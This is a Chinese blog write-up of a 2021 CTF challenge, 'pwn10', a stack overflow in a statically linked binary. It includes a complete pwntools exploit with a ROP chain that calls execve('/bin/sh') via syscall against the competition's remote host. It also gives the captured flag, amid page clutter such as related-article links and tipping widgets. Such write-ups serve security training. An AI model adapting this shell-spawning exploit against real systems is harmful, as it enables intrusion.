2021年“莲城杯”网络安全大赛-PWN-pwn10(三血)

最新推荐文章于 2024-04-20 15:12:20 发布
最新推荐文章于 2024-04-20 15:12:20 发布
阅读量876 收藏
点赞数
分类专栏: 2021年“莲城杯”网络安全大赛 文章标签: 网络安全 python 2021年“莲城杯” PWN unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/120717802
版权

2021年“莲城杯”网络安全大赛-PWN-pwn10(三血)

题目名称:pwn10
题目内容:栈溢出。靶机:nc 183.129.189.60 10016
题目分值:100.0
题目难度:容易
相关附件:pwn10的附件.zip

解题思路:

1.保护机制,静态链接,没pie

在这里插入图片描述

2.主要函数

在这里插入图片描述在这里插入图片描述

3.做pwn要注意重点,输入一个长字符串,能把name冲掉,反正是个很大的数字,不用关注count是多少,反正够用。然后用不可寻址的地址找到偏移0x78,然后 rop syscall

```python
#!/usr/bin/env python
from pwn import *

local = 0
debug = 1
binary = "./pwn10"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
elf = ELF(binary)
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    libc = ELF(lib)
else :
    p = remote("183.129.189.60","10016")
    # lib = "./libc.so.6"
    libc = ELF(lib)

s      = lambda buf        : p.send(buf)
sl     = lambda buf        : p.sendline(buf)
sa     = lambda delim, buf : p.sendafter(delim, buf)
sal    = lambda delim, buf : p.sendlineafter(delim, buf)
sh     = lambda            : p.interactive()
r      = lambda n=None     : p.recv(n)
ru     = lambda delim      : p.recvuntil(delim)
r7f    = lambda            : u64(p.recvuntil("\x7f")[-6:]+"\x00\x00")
trs    = lambda addr       : libc.address+addr
gadget = lambda ins        : libc.search(asm(ins,arch="amd64")).next()
tohex  = lambda buf        : "".join("\\x%02x"%ord(_) for _ in buf)

rop = ""
rop += p64(0x00000000004016e6) # 0x00000000004016e6: pop rdi; ret; 
rop += p64(0x00000000006ccd60)
rop += p64(0x0000000000401807) # 0x0000000000401807: pop rsi; ret; 
rop += p64(0x0000000000000000)
rop += p64(0x0000000000442d16) # 0x0000000000442d16: pop rdx; ret; 
rop += p64(0x0000000000000000)
rop += p64(0x000000000041f884) # 0x000000000041f884: pop rax; ret; 
rop += p64(0x000000000000003b)
rop += p64(0x00000000004679a5) # 0x00000000004679a5: syscall; ret; 

raw_input()
payload = "/bin/sh\x00"
payload += "A"*0x70
payload += rop
payload += "A"*0x100


sl(payload)
sh()
# DASCTF{c7d94ca4c9a02a430d8c677cbaea192b}
夜白君
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF基础知识
m0_65849838的博客
04-26 5984
文章目录一. CTF简介1.开启目并点击附件2.得到正文和flag①正文②FLAG二.竞赛模式1.开启目并点击附件2.正文和flag①正文理论知识Jeopardy-解AwD-攻防模式AWP-攻防增强RHG-自动化[ AI自动化]RW-真实世界KoH-抢占山头Mix[混合]②flag三.比赛形式1.开启目并点击附件2.正文和flag①正文线上线下②flag四.目1.开启目并点击附件二.正文和flag①正文WebPwnReverseCryptoMisc②flag 一. CTF简介 1
第二届京津冀研究生网络与信息安全技术大赛记录
promisexb的博客
11-08 1435
      11月3-4日,在北京工业大学经历了两天的安全比赛。因为之前参加过第一届的比赛,所以对这次比赛的形式还是比较熟悉。首先是两个小时的CTF比赛。第二天下午是三个小时AWD网络攻防模式的比赛。         最后获得二等奖的名词,总体来说,还算满意。作为一个新手,简单的介绍一下比赛内容,希望给以后参加比赛的人一些帮助。         CTF比赛形式:五大类目  pwn,密码学,杂...
强网杯2021 pwn解析——babypwn
CoLin的pwn小屋
07-26 579
强网杯2021 pwn回顾——babypwn
XXXX长沙标志莲城别墅项目营销提案p销售推广方案.pptx
10-18
XXXX长沙标志莲城别墅项目营销提案p销售推广方案.pptx
XXXX长沙标志莲城别墅项目营销提案p销售推广方案.ppt
02-25
XXXX长沙标志莲城别墅项目营销提案p销售推广方案.ppt
2021莲城杯比赛包.zip
10-12
2021莲城杯比赛包.zip
环境激励下湘潭莲城大桥模态参数识别研究 (2008)
05-29
对环境激励下结构模态参数识别进行了理论分析和试验研究.基于随机振动理论阐述了峰值拾取法的基本原理和方法,并提出了虚拟响应的概念.从湘潭莲城大桥在环境激励下的加速度测试信号中提取高信噪比的虚拟响应信号,根据峰值拾取法对虚拟响应信号进行频域分析,识别了该桥主跨结构的固有频率、阻尼比和振型等模态参数.试验模态参数与理论模态参数基本吻合。验证了识别结果的可靠性.模态置信矩阵表明,结构的线性响应特性明显,竖向振动具有良好的正交特性.图8,表4,参7
攻防世界,Pwn:get_shell
Pai_Space
11-06 626
1.解过程: 中给了 ip地址 和 端口 还有一个附件 根据提示运行可以拿到 shell 并且根据附件中的语句可以知道 提示中的运行指通过 ip地址 和 端口 建立连接 直接上Linux终端进行nc连接 得到flag 注意:IP地址与端口之间是 111.200.241.244 54596 而不是 111.200.241.244:54596 2.知识点: (1)shell的含义是取得对服务器某种程度上操作权限 (2)其中涉及到的Linux命令: ...
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1220
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个也是常规操作.
啥也不会还想学PWN
weixin_67749304的博客
04-26 2750
本人真小白,真的0基础。 PWN 是CTF比赛中比较难的部分。首先要做的就是把基础知识打牢。 预备知识:C语言,汇编语言,Linux基础等。 栈,是一段特殊存取的内存。它好比一个盒子,数据好比一本本的书。先放进的书会被放在盒子的最底部,后放进的书会被放在盒子的最上面。这是栈的LIFO原则。 栈溢出。在存放数据的过程中,如果不注意检测数据的顶端是否超过栈的顶端,容易产生栈溢出。 一些汇编语言的常用指令:move A ,B 表示把寄存器B中的内容放到A当中;ret 返回主程序;call 调用一个子程序
关于CTF
valosama的博客
10-13 1258
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。
WICCTF-2021-pwnCTFM
05-12
2021津门杯ctfpwn
2021莲城杯网络安全大赛-Web-Easy_go(一血)
qq_43264813的博客
10-12 2333
2021莲城杯网络安全大赛-Web-Easy_go(一血) 目名称:Easy_go 目内容:你听说过gob吗?靶机:183.129.189.60:10006 目分值:100.0 目难度:容易 解思路: 1.根据提示,生成一个 gob 序列化文件: 2.上传该文件即可: ```go package main import ( "encoding/gob" "fmt" "os" ) type person struct { Name string } // if person.Na
莲城杯2021 Crypto writes up
weixin_56678592的博客
10-12 252
莲城杯2021 Crypto writes up #1 randomCrypto 目: from random import randint flag = 'flag{********************************}' b = [ ord(i) for i in flag ] a = randint(65, max(b)) encflag="" for i in range(len(flag)): encflag += str(bin((ord(flag[i])^a)<&l
ctfshow pwn10
qq_39980610的博客
08-22 396
pwn10
CTFshow PWN 格式化字符串漏洞pwn10
Rt1Text的博客
03-27 565
checksec+运行 就是这个样子 确实还需要学习啊 KEEP LEARNING!!!!!! 32位 NX保护 ida进行中 if num == 16 即可cat flag 那么修改变量的值 明显的格式化字符串漏洞 确定参数位置 第7个 num跟进去 address=0x804A030 准备exp from pwn import* p=process('./pwn10') num_addr=0x804A030 payload=p32(num_add..
2021莲城杯网络安全大赛-PWN-free_free_free
qq_43264813的博客
10-12 1336
2021莲城杯网络安全大赛-PWN-free_free_free 目名称:free_free_free 目内容:你一定很擅长free吧。靶机:nc 183.129.189.60 10023 目分值:300.0 目难度:中等 相关附件:free_free_free的附件.zip 解思路: 1.保护机制,本地libc与远程一样,就没必要加载附件那个 2.漏洞点 - double free 3.要爆破stdout,1/16的可能,stdout-0x43有7f的size,malloc_hook-
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8174
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Ansible 指定受控端使用Python的版本
最新发布
shijin741231的博客
04-20 551
最近在装Ansible,有一台受控端Ubuntu16的服务器,安装了Python2.7.12和Pyhon3.5。当用Ansible连接它时,显示使用的是Python3.5。最后看文档,发现Ansible可以在hosts的文件中指定受控服上运行的Python

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值